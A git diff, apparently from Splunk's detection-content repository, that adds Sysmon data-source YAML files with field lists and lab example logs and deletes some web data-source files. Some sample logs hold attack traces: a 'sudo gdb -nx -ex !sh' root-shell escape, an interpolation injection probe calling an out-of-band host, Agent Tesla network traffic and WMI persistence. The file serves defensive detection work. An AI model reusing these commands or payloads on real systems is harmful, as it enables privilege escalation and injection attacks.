+- Version
+- action
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- object
+- object_category
+- object_path
+- punct
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_name
+- vendor_product
+example_log: 20342000x80000000000000006249Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-WmiConsumerEvent2020-12-08 13:54:48.514DeletedATTACKRANGE\Administrator "AtomicRedTeam-WMIPersistence-Example"Command Line "C:\\Windows\\System32\\notepad.exe"
diff --git a/data_sources/sysmon_eventid_21.yml b/data_sources/sysmon_eventid_21.yml
new file mode 100644
index 0000000000..26a6f6af57
--- /dev/null
+++ b/data_sources/sysmon_eventid_21.yml
@@ -0,0 +1,96 @@
+name: Sysmon EventID 21
+id: 304384bc-715e-4958-988b-a8051a91349a
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 21
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- Consumer
+- ConsumerNoQuotes
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- EventType
+- Filter
+- FilterNoQuotes
+- Guid
+- Keywords
+- Level
+- Name
+- Opcode
+- Operation
+- ProcessID
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- User
+- UserID
+- UtcTime
+- Version
+- change_type
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- object
+- object_attrs
+- object_category
+- object_path
+- punct
+- result
+- severity_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- status
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- user_name
+- vendor_product
+example_log: 21342100x8000000000000000151644Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-WmiBindingEvent2021-06-16 21:46:50.222ModifiedWIN-HOST-14\Administrator "CommandLineEventConsumer.Name=\"Evil
+ Persistence\"" "__EventFilter.Name=\"Evil Persistence\""
diff --git a/data_sources/sysmon_eventid_22.yml b/data_sources/sysmon_eventid_22.yml
new file mode 100644
index 0000000000..0a321131f8
--- /dev/null
+++ b/data_sources/sysmon_eventid_22.yml
@@ -0,0 +1,89 @@
+name: Sysmon EventID 22
+id: 911538b2-eba7-4d3e-85e8-d82d380c37bf
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 22
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- QueryName
+- QueryResults
+- QueryStatus
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- process_exec
+- process_guid
+- process_name
+- punct
+- query
+- query_count
+- reply_code_id
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 22542200x8000000000000000113892Microsoft-Windows-Sysmon/Operationalwin-dc-299.attackrange.local-2021-03-24
+ 12:25:12.840{3CFDEE80-2F7D-605B-F50A-00000000AE01}717250.220.65.3.spam.dnsbl.sorbs.net9003-C:\Windows\System32\wermgr.exe
diff --git a/data_sources/sysmon_eventid_23.yml b/data_sources/sysmon_eventid_23.yml
new file mode 100644
index 0000000000..9e45d94b4b
--- /dev/null
+++ b/data_sources/sysmon_eventid_23.yml
@@ -0,0 +1,103 @@
+name: Sysmon EventID 23
+id: 5ea2721d-f60c-4f48-a047-47d514e327c3
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 23
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Archived
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Hashes
+- IMPHASH
+- Image
+- IsExecutable
+- Keywords
+- Level
+- MD5
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SHA256
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- TargetFilename
+- Task
+- ThreadID
+- TimeCreated
+- User
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- file_hash
+- file_modify_time
+- file_name
+- file_path
+- host
+- id
+- index
+- linecount
+- object_category
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- tag::object_category
+- timeendpos
+- timestartpos
+- user
+- user_id
+- vendor_product
+example_log: 23542300x8000000000000000281771Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-865.attackrange.local-2023-02-01
+ 10:57:09.814{F522A29C-446D-63DA-9F01-00000000BB02}2428ATTACKRANGE\AdministratorC:\Temp\swiftslicer.exeC:\Python311\vcruntime140_1.dllMD5=75E78E4BF561031D39F86143753400FF,SHA256=1758085A61527B427C4380F0C976D29A8BEE889F2AC480C356A3F166433BF70E,IMPHASH=BF380CA954CBF10D1A4CEF9EC18E46FDtruefalse - insufficient disk space
diff --git a/data_sources/sysmon_eventid_3.yml b/data_sources/sysmon_eventid_3.yml
new file mode 100644
index 0000000000..258a07fb4c
--- /dev/null
+++ b/data_sources/sysmon_eventid_3.yml
@@ -0,0 +1,120 @@
+name: Sysmon EventID 3
+id: 01d84dff-4e26-422c-9389-6a579ee6e75b
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 3
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- DestinationHostname
+- DestinationIp
+- DestinationIsIpv6
+- DestinationPort
+- DestinationPortName
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Initiated
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- Protocol
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SourceHostname
+- SourceIp
+- SourceIsIpv6
+- SourcePort
+- SourcePortName
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- User
+- UserID
+- UtcTime
+- Version
+- action
+- app
+- creation_time
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dest_ip
+- dest_port
+- direction
+- dvc
+- dvc_ip
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- process_exec
+- process_guid
+- process_id
+- process_name
+- protocol
+- protocol_version
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src
+- src_host
+- src_ip
+- src_port
+- state
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- transport
+- transport_dest_port
+- user
+- user_id
+- vendor_product
+example_log: 354300x8000000000000000156837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-403.attackrange.local-2022-09-15
+ 12:56:19.679{6820D070-1F1B-6323-E113-000000007402}5728C:\Temp\agent_tesla-deob.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-403.attackrange.local61722-false41.77.117.236youssef5.genious.net21ftp
diff --git a/data_sources/sysmon_eventid_5.yml b/data_sources/sysmon_eventid_5.yml
new file mode 100644
index 0000000000..2472edb510
--- /dev/null
+++ b/data_sources/sysmon_eventid_5.yml
@@ -0,0 +1,87 @@
+name: Sysmon EventID 5
+id: 556471bf-44fa-44e6-97e2-eb25416aeb6d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 5
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- process
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 534500x800000000000000039965Microsoft-Windows-Sysmon/Operationalwin-dc-654.attackrange.local-2021-03-16
+ 14:01:44.004{26337912-BA32-6050-3506-00000000AE01}8672C:\Users\Public\steam.exe
diff --git a/data_sources/sysmon_eventid_6.yml b/data_sources/sysmon_eventid_6.yml
new file mode 100644
index 0000000000..943e48837d
--- /dev/null
+++ b/data_sources/sysmon_eventid_6.yml
@@ -0,0 +1,91 @@
+name: Sysmon EventID 6
+id: eadc297a-c20c-45a1-8fac-74ad54019767
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 6
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Hashes
+- ImageLoaded
+- Keywords
+- Level
+- MD5
+- Name
+- Opcode
+- ProcessID
+- RecordID
+- RecordNumber
+- RuleName
+- SHA256
+- SecurityID
+- Signature
+- SignatureStatus
+- Signed
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- process_hash
+- process_path
+- punct
+- service_signature_exists
+- service_signature_verified
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 644600x800000000000000015708989Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-702.attackrange.local-2022-04-04
+ 17:37:04.640C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\npf.sysMD5=DE7FCC77F4A503AF4CA6A47D49B3713D,SHA256=4BFAA99393F635CD05D91A64DE73EDB5639412C129E049F0FE34F88517A10FC6trueRiverbed Technology, Inc.Valid
diff --git a/data_sources/sysmon_eventid_7.yml b/data_sources/sysmon_eventid_7.yml
new file mode 100644
index 0000000000..9cc83be7e4
--- /dev/null
+++ b/data_sources/sysmon_eventid_7.yml
@@ -0,0 +1,113 @@
+name: Sysmon EventID 7
+id: 45512fa5-4d55-4088-9d51-f4dedc16fdff
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 7
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Company
+- Computer
+- Description
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- FileVersion
+- Guid
+- Hashes
+- IMPHASH
+- Image
+- ImageLoaded
+- Keywords
+- Level
+- MD5
+- Name
+- Opcode
+- OriginalFileName
+- ProcessGuid
+- ProcessID
+- ProcessId
+- Product
+- RecordID
+- RecordNumber
+- RuleName
+- SHA256
+- SecurityID
+- Signature
+- SignatureStatus
+- Signed
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- User
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- parent_process_exec
+- parent_process_guid
+- parent_process_id
+- parent_process_name
+- parent_process_path
+- process_exec
+- process_hash
+- process_name
+- process_path
+- punct
+- service_dll_signature_exists
+- service_dll_signature_verified
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::action
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- user_id
+- vendor_product
+example_log: 734700x800000000000000045273Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2023-09-12
+ 08:06:31.433{8814F3F5-1C07-6500-9600-000000000E03}4440C:\Users\Administrator\AppData\Local\Temp\server.exeC:\Users\Administrator\AppData\Local\Temp\server.exe-----MD5=696CBE2CB6F7FAC5ED6262BCA51238BB,SHA256=43005D86607DC94C7D378AA1B8844947BAA03860652F2F2340266061AF12E524,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744false-UnavailableATTACKRANGE\Administrator
diff --git a/data_sources/sysmon_eventid_8.yml b/data_sources/sysmon_eventid_8.yml
new file mode 100644
index 0000000000..8657567471
--- /dev/null
+++ b/data_sources/sysmon_eventid_8.yml
@@ -0,0 +1,105 @@
+name: Sysmon EventID 8
+id: df7a786c-ade0-48f0-8596-26f10d169f7d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 8
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Keywords
+- Level
+- Name
+- NewThreadId
+- Opcode
+- ProcessID
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SourceImage
+- SourceProcessGuid
+- SourceProcessId
+- StartAddress
+- StartFunction
+- StartModule
+- SystemTime
+- System_Props_Xml
+- TargetImage
+- TargetProcessGuid
+- TargetProcessId
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- parent_process_exec
+- parent_process_guid
+- parent_process_id
+- parent_process_name
+- parent_process_path
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- src_address
+- src_function
+- src_module
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 824800x8000000000000000362233Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-487.attackrange.local-2022-10-27
+ 13:59:12.427{3381F800-8EB0-635A-1306-000000008A02}4864C:\Windows\SysWOW64\wermgr.exe{3381F800-8085-635A-2701-000000008A02}5572C:\Windows\System32\Taskmgr.exe49640x0000000000C20000--
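Review bot: `description: Data source object for Sysmon EventID 8` only repeats the `name` line and tells a reader nothing about what the event is, even though the field list (`SourceImage`, `TargetImage`, `StartAddress`, `StartFunction`, `StartModule`, `NewThreadId`) identifies it as Sysmon's CreateRemoteThread event. A one-line description naming the event type, e.g. `description: Sysmon EventID 8 (CreateRemoteThread) - a process creating a thread in another process; key fields are SourceImage, TargetImage and StartAddress.`, would make the object useful without opening the Sysmon schema. The same boilerplate description is used in sysmon_eventid_9.yml (RawAccessRead, hence the `Device` field), sysmon_for_linux_eventid_1.yml (ProcessCreate) and sysmon_for_linux_eventid_11.yml (FileCreate) in this commit.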
diff --git a/data_sources/sysmon_eventid_9.yml b/data_sources/sysmon_eventid_9.yml
new file mode 100644
index 0000000000..5fa985f0a0
--- /dev/null
+++ b/data_sources/sysmon_eventid_9.yml
@@ -0,0 +1,87 @@
+name: Sysmon EventID 9
+id: ae4a6a24-9b8c-4386-a7ac-677d7ad5bf09
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon EventID 9
+source: XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
+sourcetype: xmlwineventlog
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon
+ url: https://splunkbase.splunk.com/app/5709/
+ version: 4.0.0
+fields:
+- _time
+- Channel
+- Computer
+- Device
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RecordNumber
+- RuleName
+- SecurityID
+- SystemTime
+- System_Props_Xml
+- Task
+- ThreadID
+- TimeCreated
+- UserID
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc_nt_host
+- event_id
+- eventtype
+- host
+- id
+- index
+- linecount
+- os
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user_id
+- vendor_product
+example_log: 924900x8000000000000000190607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-478.attackrange.local-2022-02-25
+ 12:25:33.359{414E8EDF-CABB-6218-F103-000000003702}6068C:\Temp\c.exe\Device\HarddiskVolume1
diff --git a/data_sources/sysmon_for_linux_eventid_1.yml b/data_sources/sysmon_for_linux_eventid_1.yml
new file mode 100644
index 0000000000..9ee369f5b8
--- /dev/null
+++ b/data_sources/sysmon_for_linux_eventid_1.yml
@@ -0,0 +1,116 @@
+name: Sysmon for Linux EventID 1
+id: 93643652-30fe-4941-a1f7-6454f2948660
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon for Linux EventID 1
+source: Syslog:Linux-Sysmon/Operational
+sourcetype: sysmon:linux
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon for Linux
+ url: https://splunkbase.splunk.com/app/6652
+ version: 1.0.0
+fields:
+- _time
+- Channel
+- CommandLine
+- Company
+- Computer
+- CurrentDirectory
+- Description
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- FileVersion
+- Guid
+- Hashes
+- Image
+- IntegrityLevel
+- Keywords
+- Level
+- LogonGuid
+- LogonId
+- Name
+- Opcode
+- OriginalFileName
+- ParentCommandLine
+- ParentImage
+- ParentProcessGuid
+- ParentProcessId
+- ParentUser
+- ProcessGuid
+- ProcessID
+- ProcessId
+- Product
+- RecordID
+- RuleName
+- SystemTime
+- System_Props_Xml
+- Task
+- TerminalSessionId
+- ThreadID
+- User
+- UserId
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- eventtype
+- host
+- index
+- linecount
+- original_file_name
+- os
+- parent_process
+- parent_process_exec
+- parent_process_guid
+- parent_process_id
+- parent_process_name
+- parent_process_path
+- process
+- process_current_directory
+- process_exec
+- process_guid
+- process_hash
+- process_id
+- process_integrity_level
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- timeendpos
+- timestartpos
+- user
+- vendor_product
+example_log: 154100x80000000000000001926574Linux-Sysmon/Operationalar-linux-2022-08-09
+ 10:42:47.757{ec23eae3-3a27-62f2-085e-16549b550000}10268/usr/bin/sudo-----sudo gdb -nx -ex !sh -ex
+ quit/home/ubuntuubuntu{ec23eae3-315b-62f2-e803-000000000000}100013no level-{ec23eae3-315b-62f2-4884-4ea587550000}15369/bin/bash-bashubuntu
diff --git a/data_sources/sysmon_for_linux_eventid_11.yml b/data_sources/sysmon_for_linux_eventid_11.yml
new file mode 100644
index 0000000000..8276870f8a
--- /dev/null
+++ b/data_sources/sysmon_for_linux_eventid_11.yml
@@ -0,0 +1,88 @@
+name: Sysmon for Linux EventID 11
+id: 14672fed-235a-411f-8062-ace9696fb2af
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Sysmon for Linux EventID 11
+source: Syslog:Linux-Sysmon/Operational
+sourcetype: sysmon:linux
+separator: EventID
+supported_TA:
+- name: Splunk Add-on for Sysmon for Linux
+ url: https://splunkbase.splunk.com/app/6652
+ version: 1.0.0
+fields:
+- _time
+- Channel
+- Computer
+- CreationUtcTime
+- EventChannel
+- EventCode
+- EventData_Xml
+- EventDescription
+- EventID
+- EventRecordID
+- Guid
+- Image
+- Keywords
+- Level
+- Name
+- Opcode
+- ProcessGuid
+- ProcessID
+- ProcessId
+- RecordID
+- RuleName
+- SystemTime
+- System_Props_Xml
+- TargetFilename
+- Task
+- ThreadID
+- User
+- UserId
+- UtcTime
+- Version
+- action
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- eventtype
+- file_create_time
+- file_name
+- file_path
+- host
+- index
+- linecount
+- object_category
+- process_exec
+- process_guid
+- process_id
+- process_name
+- process_path
+- punct
+- signature
+- signature_id
+- source
+- sourcetype
+- splunk_server
+- tag
+- tag::eventtype
+- tag::object_category
+- timeendpos
+- timestartpos
+- user
+- vendor_product
+example_log: 11241100x8000000000000000792913Linux-Sysmon/Operationalsysmonlinux-tcontreras-attack-range-4134-2021-12-20
+ 16:07:17.929{ec2c97d1-6aa9-61c0-3038-618238560000}5256/opt/splunkforwarder/bin/splunkd/opt/splunkforwarder/var/lib/splunk/modinputs/journald/sysmon.checkpoint.tmp.dbed9d351dcc18062021-12-20 16:07:17.929root
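Review bot: The `example_log` closing this hunk records the Splunk forwarder writing its own journald checkpoint file (`/opt/splunkforwarder/bin/splunkd` creating `.../modinputs/journald/sysmon.checkpoint.tmp`), which is the collector's background noise rather than the kind of file creation a detection on this source would be looking at. A sample produced by an ordinary user or service process would illustrate the source better and would avoid implying that splunkd's own writes are representative events. Documentation-only; no field change is implied.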
diff --git a/data_sources/web/AWS_Cloudfront.yml b/data_sources/web/AWS_Cloudfront.yml
deleted file mode 100644
index 4ddd55d184..0000000000
--- a/data_sources/web/AWS_Cloudfront.yml
+++ /dev/null
@@ -1,97 +0,0 @@
-name: AWS Cloudfront
-id: 780086dc-2384-45b6-ade7-56cb00105464
-author: Patrick Bareiss, Splunk
-source: aws
-sourcetype: aws:cloudfront:accesslogs
-supported_TA:
- name: Splunk Add-on for Amazon Web Services (AWS)
- version: 7.4.1
- url: https://splunkbase.splunk.com/app/1876
-event_names: []
-fields:
- - _time
- - action
- - app
- - bytes
- - bytes_in
- - bytes_out
- - c_ip
- - c_port
- - cached
- - category
- - client_ip
- - cs_bytes
- - cs_cookie
- - cs_host
- - cs_method
- - cs_protocol
- - cs_protocol_version
- - cs_referer
- - cs_uri_query
- - cs_uri_stem
- - cs_user_agent
- - date
- - date_hour
- - date_mday
- - date_minute
- - date_month
- - date_second
- - date_wday
- - date_year
- - date_zone
- - dest
- - duration
- - edge_location_name
- - eventtype
- - fle_encrypted_fields
- - fle_status
- - host
- - http_content_type
- - http_method
- - http_user_agent
- - http_user_agent_length
- - index
- - linecount
- - punct
- - response_time
- - sc_bytes
- - sc_content_len
- - sc_content_type
- - sc_range_end
- - sc_range_start
- - sc_status
- - source
- - sourcetype
- - splunk_server
- - src
- - src_ip
- - src_port
- - ssl_cipher
- - ssl_protocol
- - status
- - tag
- - tag::eventtype
- - time
- - time_taken
- - time_to_first_byte
- - timeendpos
- - timestartpos
- - uri_path
- - url
- - url_domain
- - url_length
- - vendor_product
- - x_edge_detail_result_type
- - x_edge_location
- - x_edge_request_id
- - x_edge_response_result_type
- - x_edge_result_type
- - x_forwarded_for
- - x_host_header
-example_log:
- "2023-11-07\t16:58:21\tIAD55-P5\t921\t44.192.78.55\tGET\td3u5aue66f5ui4.cloudfront.net\t\
- /plugins/servlet/com.jsos.shell/ShellServlet\t200\t-\tSlackbot-LinkExpanding%201.0%20(+https://api.slack.com/robots)\t\
- -\t-\tLambdaGeneratedResponse\tsGwvFCkFU4qlMxatCoJRgW87P7Ee8bKQor3U6lRt6I6jaFvLC7vcPA==\t\
- confluence.catjamfest.com\thttps\t232\t0.276\t-\tTLSv1.3\tTLS_AES_128_GCM_SHA256\t\
- LambdaGeneratedResponse\tHTTP/1.1\t-\t-\t57232\t0.276\tLambdaGeneratedResponse\t\
- text/html\t527\t-\t-"
diff --git a/data_sources/web/Bro.yml b/data_sources/web/Bro.yml
deleted file mode 100644
index 86eb037d76..0000000000
--- a/data_sources/web/Bro.yml
+++ /dev/null
@@ -1,75 +0,0 @@
-name: Bro
-id: c5d9612b-0ffd-44d3-8247-3cf3486ec5e2
-author: Patrick Bareiss, Splunk
-source: bro:http:json
-sourcetype: bro:http:json
-supported_TA: {}
-event_names: []
-fields:
- - _time
- - bytes
- - bytes_in
- - bytes_out
- - dest
- - dest_host
- - dest_ip
- - dest_port
- - direction
- - dvc
- - eventtype
- - flow_id
- - host
- - host_header
- - http_content_type
- - http_method
- - http_user_agent
- - http_user_agent_length
- - id.orig_h
- - id.orig_p
- - id.resp_h
- - id.resp_p
- - id_orig_h
- - id_orig_p
- - id_resp_h
- - index
- - is_broadcast
- - is_dest_internal_ip
- - is_src_internal_ip
- - linecount
- - method
- - product
- - punct
- - request_body_len
- - resp_fuids
- - resp_fuids{}
- - resp_mime_types
- - resp_mime_types{}
- - response_body_len
- - sensor_name
- - site
- - source
- - sourcetype
- - splunk_server
- - src
- - src_ip
- - src_port
- - status
- - status_code
- - status_msg
- - tag
- - tag::eventtype
- - timestamp
- - trans_depth
- - ts
- - uid
- - uri
- - uri_path
- - uri_query
- - url
- - user_agent
- - vendor
- - vendor_product
- - version
-example_log:
- '{"ts":"2022-10-26T18:00:59.345538Z","uid":"CobZQ21IIZvzswjyjh","id.orig_h":"10.0.1.15","id.orig_p":16976,"id.resp_h":"10.0.1.20","id.resp_p":8080,"trans_depth":1,"method":"GET","host":"10.0.1.20","uri":"/?q=${url:UTF-8:https://10.0.1.20:8080.q.cdcnbmk03o13j77svqvgpu44hdbnhypcq.oast.site}","version":"1.1","user_agent":"Mozilla/5.0
- (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36","request_body_len":0,"response_body_len":121,"status_code":404,"status_msg":"","tags":[],"resp_fuids":["FxuRnn2rNk2RjIfQQ8"],"resp_mime_types":["text/json"]}'
diff --git a/data_sources/web/Nginx_Access.yml b/data_sources/web/Nginx_Access.yml
deleted file mode 100644
index 4c30be7268..0000000000
--- a/data_sources/web/Nginx_Access.yml
+++ /dev/null
@@ -1,81 +0,0 @@
-name: Nginx Access
-id: c716a418-eab3-4df5-9dff-5420174e3068
-author: Patrick Bareiss, Splunk
-source: /var/log/nginx/access.log
-sourcetype: nginx:plus:kv
-supported_TA: {}
-event_names: []
-fields:
- - _time
- - JSESSIONID
- - action
- - app
- - bootstrapStatusProvider_applicationConfig_setupComplete
- - bytes
- - bytes_in
